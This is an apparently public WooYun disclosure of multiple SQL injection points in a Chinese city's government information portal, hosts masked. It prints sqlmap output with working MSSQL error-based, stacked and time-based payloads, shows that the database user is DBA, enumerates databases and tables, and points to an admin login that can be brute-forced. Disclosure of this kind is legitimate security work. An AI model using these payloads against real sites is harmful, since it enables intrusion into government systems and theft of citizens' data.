当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155211

漏洞标题:某市政务公开门户网多处存在GET注入打包(DBA权限+7个数据库+可泄漏敏感信息+密码明文可登录后台进行任意管理操作)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-11-23 19:04

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT,多处参数存在GET的SQL注入,DBA权限,可泄露敏感信息,密码明文,可进入后台进行操作!~~~

详细说明:

网站地址:(此处请帮忙打码)

http://**.**.**.**
**.**.**.**


一样的!~~~
注入地址一:
http://***.***.***.***/qygk/ml_lbnr.aspx?id=7775
http://***.***.***.***/default/GzdtListShow.aspx?id=288
http://***.***.***.***/Zxjj/ZrxxListShow.aspx?id=4383
id存在注入
测试
http://***.***.***.***/default/GzdtListShow.aspx?id=288'
返回错误

0.jpg


1.jpg


2.jpg


2-1.jpg


sqlmap测试

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: id=288'; IF(7497=7497) SELECT 7497 ELSE DROP FUNCTION AWSX--
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=288' AND 3948=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(112)+
CHAR(121)+CHAR(113)+(SELECT (CASE WHEN (3948=3948) THEN CHAR(49) ELSE CHAR(48) E
ND))+CHAR(113)+CHAR(110)+CHAR(108)+CHAR(113)+CHAR(113))) AND 'VAKM'='VAKM
---
[21:26:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[21:26:05] [INFO] fetching current user
[21:26:06] [INFO] retrieved: web
current user:    'web'
[21:26:06] [INFO] fetching current database
[21:26:07] [INFO] retrieved: zwdt
current database:    'zwdt'
[21:26:07] [INFO] testing if current user is DBA
current user is DBA:    True
 
available databases [7]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] zwdt
[*] zwdt_change
[*] zwdtUp
Database: master
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| sys.dm_os_memory_objects                         | 186997  |
| sys.messages                                     | 67941   |
| sys.sysmessages                                  | 67941   |
| sys.dm_os_memory_cache_entries                   | 39484   |
| sys.syscacheobjects                              | 38894   |
| sys.dm_exec_cached_plans                         | 38747   |
| sys.dm_exec_query_stats                          | 17833   |
| sys.dm_os_buffer_descriptors                     | 14580   |
| sys.syscolumns                                   | 11157   |
| sys.all_parameters                               | 6698    |
| sys.system_parameters                            | 6697    |
| sys.trace_subclass_values                        | 4722    |
| sys.all_columns                                  | 4254    |
| sys.trace_event_bindings                         | 3958    |
| sys.system_columns                               | 3696    |
| sys.dm_os_ring_buffers                           | 3085    |
| sys.syscomments                                  | 2748    |
| dbo.spt_values                                   | 2346    |
| sys.dm_os_virtual_address_dump                   | 2080    |
| sys.all_objects                                  | 1808    |
| sys.sysobjects                                   | 1808    |
| sys.system_objects                               | 1741    |
| sys.database_permissions                         | 1645    |
| sys.syspermissions                               | 1644    |
| sys.sysprotects                                  | 1642    |
| sys.all_sql_modules                              | 1592    |
| sys.system_sql_modules                           | 1589    |
| sys.dm_os_performance_counters                   | 723     |
| sys.sysperfinfo                                  | 723     |
| sys.system_internals_partition_columns           | 693     |
| sys.columns                                      | 558     |
| sys.dm_exec_query_transformation_stats           | 376     |
| sys.stats_columns                                | 292     |
| sys.all_views                                    | 284     |
| sys.system_views                                 | 284     |
| sys.index_columns                                | 219     |
| sys.sysindexkeys                                 | 219     |
| sys.dm_os_wait_stats                             | 194     |
| sys.event_notification_event_types               | 193     |
| sys.dm_os_memory_clerks                          | 175     |
| sys.sysindexes                                   | 174     |
| sys.trace_events                                 | 171     |
| sys.stats                                        | 168     |
| sys.dm_os_latch_stats                            | 136     |
| sys.dm_os_memory_cache_clock_hands               | 114     |
| sys.syscharsets                                  | 114     |
| sys.allocation_units                             | 112     |
| sys.system_internals_allocation_units            | 112     |
| sys.dm_db_index_usage_stats                      | 103     |
| sys.dm_db_partition_stats                        | 101     |
| sys.indexes                                      | 101     |
| sys.partitions                                   | 101     |
| sys.system_internals_partitions                  | 101     |
| sys.system_components_surface_area_configuration | 98      |
| sys.xml_schema_facets                            | 97      |
| sys.xml_schema_components                        | 93      |
| sys.dm_os_loaded_modules                         | 90      |
| sys.xml_schema_types                             | 77      |
| sys.objects                                      | 67      |
| sys.trace_columns                                | 65      |
| sys.configurations                               | 62      |
| sys.sysconfigures                                | 62      |
| sys.syscurconfigs                                | 62      |
| sys.dm_os_memory_cache_counters                  | 57      |
| sys.dm_os_threads                                | 57      |
| INFORMATION_SCHEMA.COLUMNS                       | 50      |
| sys.fulltext_document_types                      | 50      |
| sys.dm_os_worker_local_storage                   | 49      |
| sys.dm_os_workers                                | 49      |
| sys.fulltext_languages                           | 48      |
| sys.dm_os_memory_pools                           | 46      |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES             | 44      |
| sys.dm_os_memory_cache_hash_tables               | 43      |
| sys.dm_exec_query_optimizer_info                 | 38      |
| sys.syslanguages                                 | 33      |
| sys.dm_os_tasks                                  | 32      |
| sys.dm_db_session_space_usage                    | 28      |
| sys.dm_db_task_space_usage                       | 28      |
| sys.dm_exec_sessions                             | 28      |
| sys.systypes                                     | 27      |
| sys.types                                        | 27      |
| sys.sysprocesses                                 | 24      |
| sys.securable_classes                            | 21      |
| sys.trace_categories                             | 21      |
| sys.dm_tran_active_transactions                  | 20      |
| sys.dm_tran_database_transactions                | 20      |
| sys.server_principals                            | 20      |
| sys.dm_exec_requests                             | 19      |
| sys.server_permissions                           | 18      |
| sys.xml_schema_component_placements              | 17      |
| sys.database_principals                          | 16      |
| sys.sysusers                                     | 16      |
| sys.dm_db_missing_index_details                  | 15      |
| sys.dm_db_missing_index_group_stats              | 15      |
| sys.dm_db_missing_index_groups                   | 15      |
| sys.dm_os_stacks                                 | 15      |
| INFORMATION_SCHEMA.SCHEMATA                      | 14      |
| sys.master_files                                 | 14      |
| sys.schemas                                      | 14      |
| sys.service_message_types                        | 14      |
| sys.sysaltfiles                                  | 14      |
| sys.xml_schema_attributes                        | 14      |
| sys.dm_os_waiting_tasks                          | 12      |
| sys.dm_os_schedulers                             | 11      |
| sys.service_contract_message_usages              | 11      |
| sys.syslogins                                    | 11      |
| sys.crypt_properties                             | 8       |
| sys.dm_tran_locks                                | 8       |
| sys.database_mirroring                           | 7       |
| sys.database_recovery_status                     | 7       |
| sys.databases                                    | 7       |
| sys.dm_exec_connections                          | 7       |
| sys.sysdatabases                                 | 7       |
| INFORMATION_SCHEMA.TABLES                        | 6       |
| sys.server_role_members                          | 6       |
| sys.service_contracts                            | 6       |
| sys.tables                                       | 6       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES              | 5       |
| sys.certificates                                 | 5       |
| sys.endpoints                                    | 5       |
| sys.dm_os_hosts                                  | 4       |
| dbo.MSreplication_options                        | 3       |
| INFORMATION_SCHEMA.ROUTINES                      | 3       |
| sys.dm_clr_properties                            | 3       |
| sys.identity_columns                             | 3       |
| sys.internal_tables                              | 3       |
| sys.login_token                                  | 3       |
| sys.procedures                                   | 3       |
| sys.service_queue_usages                         | 3       |
| sys.service_queues                               | 3       |
| sys.services                                     | 3       |
| sys.sql_modules                                  | 3       |
| sys.syslockinfo                                  | 3       |
| sys.syssegments                                  | 3       |
| sys.xml_schema_namespaces                        | 3       |
| sys.database_files                               | 2       |
| sys.dm_broker_queue_monitors                     | 2       |
| sys.dm_fts_memory_pools                          | 2       |
| sys.key_encryptions                              | 2       |
| sys.service_contract_usages                      | 2       |
| sys.sql_logins                                   | 2       |
| sys.sysfiles                                     | 2       |
| sys.tcp_endpoints                                | 2       |
| dbo.spt_monitor                                  | 1       |
| INFORMATION_SCHEMA.PARAMETERS                    | 1       |
| sys.data_spaces                                  | 1       |
| sys.database_role_members                        | 1       |
| sys.default_constraints                          | 1       |
| sys.dm_db_file_space_usage                       | 1       |
| sys.dm_exec_background_job_queue_stats           | 1       |
| sys.dm_os_sys_info                               | 1       |
| sys.dm_tran_current_transaction                  | 1       |
| sys.filegroups                                   | 1       |
| sys.linked_logins                                | 1       |
| sys.parameters                                   | 1       |
| sys.routes                                       | 1       |
| sys.servers                                      | 1       |
| sys.symmetric_keys                               | 1       |
| sys.sysconstraints                               | 1       |
| sys.sysfilegroups                                | 1       |
| sys.sysmembers                                   | 1       |
| sys.sysoledbusers                                | 1       |
| sys.sysservers                                   | 1       |
| sys.traces                                       | 1       |
| sys.user_token                                   | 1       |
| sys.via_endpoints                                | 1       |
| sys.xml_schema_collections                       | 1       |
| sys.xml_schema_model_groups                      | 1       |
| sys.xml_schema_wildcards                         | 1       |
+--------------------------------------------------+---------+
Database: zwdtUp
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.qygk_lb                                      | 2788    |
| dbo.qygk_nsjg                                    | 1007    |
| dbo.qygk_ldcy                                    | 592     |
| dbo.qygk_lmlb                                    | 358     |
| dbo.qygk_nr                                      | 229     |
| dbo.qygk_User                                    | 215     |
| dbo.qygk_dwgl                                    | 209     |
| dbo.qygk_tsdh                                    | 125     |
| dbo.qygk_bsxm                                    | 115     |
| dbo.qygk_dwfl                                    | 25      |
| dbo.qygk_lm                                      | 20      |
+--------------------------------------------------+---------+
Database: zwdt
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.dt_askOnline                                 | 118755  |
| dbo.qygk_wzb                                     | 28000   |
| dbo.dt_manageMail                                | 12632   |
| dbo.qygk_lb                                      | 3429    |
| dbo.qygk_nsjg                                    | 1759    |
| dbo.qygk_zjjs                                    | 1621    |
| dbo.qygk_ldcy                                    | 903     |
| dbo.qygk_bmgl                                    | 729     |
| dbo.dt_zcfg                                      | 600     |
| dbo.dt_item                                      | 505     |
| dbo.dt_faq                                       | 442     |
| dbo.qygk_lmlb                                    | 373     |
| dbo.qygk_nr                                      | 349     |
| dbo.dt_table                                     | 326     |
| dbo.qygk_bsxm                                    | 303     |
| dbo.qygk_dwgl                                    | 214     |
| dbo.qygk_lmb                                     | 194     |
| dbo.qygk_tsdh                                    | 186     |
| dbo.dt_ryxg                                      | 144     |
| dbo.dt_info                                      | 97      |
| dbo.qygk_News                                    | 81      |
| dbo.dt_dept                                      | 60      |
| dbo.dt_window_tel                                | 54      |
| dbo.dt_url                                       | 45      |
| dbo.LSB                                          | 45      |
| dbo.qygk_lmlx2                                   | 26      |
| dbo.qygk_dwfl                                    | 25      |
| dbo.qygk_User                                    | 23      |
| dbo.qygk_lm                                      | 20      |
| dbo.dt_rules                                     | 15      |
| dbo.qygk_qygl                                    | 13      |
| dbo.dt_office_tel                                | 12      |
| dbo.dt_Zqyjzl                                    | 12      |
| dbo.qygk_lmlx                                    | 10      |
| dbo.s_User                                       | 5       |
| dbo.dt_introduction                              | 4       |
| dbo.qygk_jsxm                                    | 4       |
| dbo.qygk_NewsLb                                  | 4       |
| dbo.sqlmapoutput                                 | 4       |
| dbo.dt_LsLb                                      | 3       |
+--------------------------------------------------+---------+
Database: zwdt_change
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.qygk_wzb                                     | 28000   |
| dbo.qygk_lb                                      | 2271    |
| dbo.qygk_zjjs                                    | 1621    |
| dbo.qygk_nsjg                                    | 1195    |
| dbo.qygk_bmgl                                    | 729     |
| dbo.dt_zcfg                                      | 600     |
| dbo.dt_item                                      | 505     |
| dbo.qygk_ldcy                                    | 502     |
| dbo.dt_askOnline                                 | 484     |
| dbo.dt_faq                                       | 442     |
| dbo.qygk_lmlb                                    | 358     |
| dbo.dt_table                                     | 326     |
| dbo.qygk_nr                                      | 239     |
| dbo.qygk_lmb                                     | 194     |
| dbo.qygk_dwgl                                    | 192     |
| dbo.qygk_bsxm                                    | 155     |
| dbo.qygk_tsdh                                    | 116     |
| dbo.dt_ryxg                                      | 112     |
| dbo.dt_window_tel                                | 93      |
| dbo.dt_dept                                      | 60      |
| dbo.dt_manageMail                                | 54      |
| dbo.dt_url                                       | 50      |
| dbo.dt_info                                      | 47      |
| dbo.qygk_News                                    | 28      |
| dbo.qygk_lmlx2                                   | 26      |
| dbo.qygk_dwfl                                    | 25      |
| dbo.qygk_User                                    | 21      |
| dbo.qygk_lm                                      | 20      |
| dbo.dt_rules                                     | 15      |
| dbo.dt_office_tel                                | 13      |
| dbo.qygk_qygl                                    | 13      |
| dbo.qygk_lmlx                                    | 10      |
| dbo.dt_introduction                              | 4       |
| dbo.qygk_jsxm                                    | 4       |
| dbo.qygk_NewsLb                                  | 4       |
| dbo.dt_LsLb                                      | 3       |
| dbo.s_User                                       | 2       |
+--------------------------------------------------+---------+


3.jpg


4.jpg


5.jpg


6.jpg


7.jpg


注入点二:
http://***.***.***.***/ckdw/main.aspx?no=3367

GET parameter 'no' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 41 HTTP(s) requ
ests:
---
Place: GET
Parameter: no
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: no=3367' AND 9910=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(122)
+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9910=9910) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(97)+CHAR(109)+CHAR(104)+CHAR(113))) AND 'psZS'='psZS
---
[01:04:25] [INFO] testing Microsoft SQL Server
[01:04:26] [INFO] confirming Microsoft SQL Server
[01:04:27] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[01:04:27] [INFO] fetching current user
[01:04:27] [INFO] retrieved: web
current user:    'web'
[01:04:27] [INFO] fetching current database
[01:04:28] [INFO] retrieved: zwdt
current database:    'zwdt'
[01:04:28] [INFO] testing if current user is DBA
current user is DBA:    True


注入点三:
http://***.***.***.***/ckdw/item.aspx?id=6100be95-2317-4c8a-b279-73bec4b57954

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 40 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=6100be95-2317-4c8a-b279-73bec4b57954' AND 6574=CONVERT(INT,(SELE
CT CHAR(113)+CHAR(116)+CHAR(99)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (6574=657
4) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(112)+CHAR(103)+CHA
R(113))) AND 'coYu'='coYu
---
[01:07:45] [INFO] testing Microsoft SQL Server
[01:07:46] [INFO] confirming Microsoft SQL Server
[01:07:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[01:07:47] [INFO] fetching current user
[01:07:47] [INFO] retrieved: web
current user:    'web'
[01:07:47] [INFO] fetching current database
[01:07:48] [INFO] retrieved: zwdt
current database:    'zwdt'
[01:07:48] [INFO] testing if current user is DBA
current user is DBA:    True


注入点四:
http://***.***.***.***/qygk/list.aspx?qyid=1&bmid=2386&lmid=1003001

GET parameter 'lmid' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] N
sqlmap identified the following injection points with a total of 186 HTTP(s) req
uests:
---
Place: GET
Parameter: bmid
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: qyid=1&bmid=2386' AND 3134=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+
CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (3134=3134) THEN CHAR(49) ELSE
CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(100)+CHAR(116)+CHAR(113))) AND 'cChZ'='c
ChZ&lmid=1003001
Place: GET
Parameter: lmid
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: qyid=1&bmid=2386&lmid=1003001' AND 2738=CONVERT(INT,(SELECT CHAR(11
3)+CHAR(112)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2738=2738) THEN C
HAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(100)+CHAR(116)+CHAR(113)))
AND 'ORQa'='ORQa
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: bmid, type: Single quoted string (default)
[1] place: GET, parameter: lmid, type: Single quoted string
[q] Quit
> 0
[01:21:03] [INFO] testing Microsoft SQL Server
[01:21:04] [INFO] confirming Microsoft SQL Server
[01:21:06] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[01:21:06] [INFO] fetching current user
[01:21:06] [INFO] retrieved: web
current user:    'web'
[01:21:06] [INFO] fetching current database
[01:21:07] [INFO] retrieved: zwdt
current database:    'zwdt'
[01:21:07] [INFO] testing if current user is DBA
current user is DBA:    True


注入点五:
http://***.***.***.***/qygk/main.aspx?qy=1&lmid=1022

不添加--level 3测试
GET parameter 'lmid' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] N
sqlmap identified the following injection points with a total of 15 HTTP(s) requ
ests:
---
Place: GET
Parameter: lmid
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: qy=1&lmid=1022%' AND 9519=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+C
HAR(101)+CHAR(115)+CHAR(113)+(SELECT (CASE WHEN (9519=9519) THEN CHAR(49) ELSE C
HAR(48) END))+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(109)+CHAR(113))) AND '%'='
---
[01:54:57] [INFO] testing Microsoft SQL Server
[01:54:57] [INFO] confirming Microsoft SQL Server
[01:54:59] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[01:54:59] [INFO] fetching current user
[01:55:00] [INFO] retrieved: web
current user:    'web'
[01:55:00] [INFO] fetching current database
[01:55:00] [INFO] retrieved: zwdt
current database:    'zwdt'
[01:55:00] [INFO] testing if current user is DBA
current user is DBA:    True
添加--level 3测试
GET parameter 'lmid' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] N
sqlmap identified the following injection points with a total of 464 HTTP(s) req
uests:
---
Place: GET
Parameter: lmid
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: qy=1&lmid=1022'; IF(9421=9421) SELECT 9421 ELSE DROP FUNCTION klvV-
-
---
[01:53:16] [INFO] testing Microsoft SQL Server
[01:53:16] [INFO] confirming Microsoft SQL Server
[01:53:18] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[01:53:18] [INFO] fetching current user
[01:53:18] [INFO] retrieving the length of query output
[01:53:18] [INFO] retrieved: 3
[01:53:24] [INFO] retrieved: web
current user:    'web'
[01:53:24] [INFO] fetching current database
[01:53:24] [INFO] retrieving the length of query output
[01:53:24] [INFO] retrieved: 4
[01:53:33] [INFO] retrieved: zwdt
current database:    'zwdt'
[01:53:33] [INFO] testing if current user is DBA
current user is DBA:    True


注入点六:
http://***.***.***.***/Zxjj/Zxjs.aspx?lb=d

GET parameter 'lb' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 17 HTTP(s) requ
ests:
---
Place: GET
Parameter: lb
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: lb=d' AND 5848=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(121)+CH
AR(116)+CHAR(113)+(SELECT (CASE WHEN (5848=5848) THEN CHAR(49) ELSE CHAR(48) END
))+CHAR(113)+CHAR(113)+CHAR(116)+CHAR(109)+CHAR(113))) AND 'CXVm'='CXVm
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: lb=d'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: lb=d' WAITFOR DELAY '0:0:5'--
---
[01:57:12] [INFO] testing Microsoft SQL Server
[01:57:15] [INFO] confirming Microsoft SQL Server
[01:57:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[01:57:17] [INFO] fetching current user
[01:57:17] [INFO] retrieved: web
current user:    'web'
[01:57:17] [INFO] fetching current database
[01:57:17] [INFO] retrieved: zwdt
current database:    'zwdt'
[01:57:17] [INFO] testing if current user is DBA
current user is DBA:    True


注入点七
http://***.***.***.***/Zxjj/LstdListN.aspx?lb=02

GET parameter 'lb' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 20 HTTP(s) requ
ests:
---
Place: GET
Parameter: lb
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: lb=02' AND 9444=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(100)+C
HAR(121)+CHAR(113)+(SELECT (CASE WHEN (9444=9444) THEN CHAR(49) ELSE CHAR(48) EN
D))+CHAR(113)+CHAR(117)+CHAR(120)+CHAR(99)+CHAR(113))) AND 'KBxT'='KBxT
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: lb=02'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: lb=02' WAITFOR DELAY '0:0:5'--
---
[02:01:39] [INFO] testing Microsoft SQL Server
[02:01:40] [INFO] confirming Microsoft SQL Server
[02:01:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[02:01:41] [INFO] fetching current user
[02:01:41] [INFO] retrieved: web
current user:    'web'
[02:01:41] [INFO] fetching current database
[02:01:42] [INFO] retrieved: zwdt
current database:    'zwdt'
[02:01:42] [INFO] testing if current user is DBA
current user is DBA:    True


应该还有GET参数的注入,就自己排查吧!~~~
后台登录地址
http://***.***.***.***/manage/Default/admin_login.aspx

8.jpg


没有验证,可以进行爆破,这就不测试了!~~~

漏洞证明:

如上

修复方案:

过滤修复
登录验证

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-11-27 13:40

厂商回复:

CNVD未直接复现所述情况,按照漏洞报送者所述情况整理通报,转由CNCERT下发给吉林分中心,由吉林分中心后续协调网站管理单位处置。

最新状态:

暂无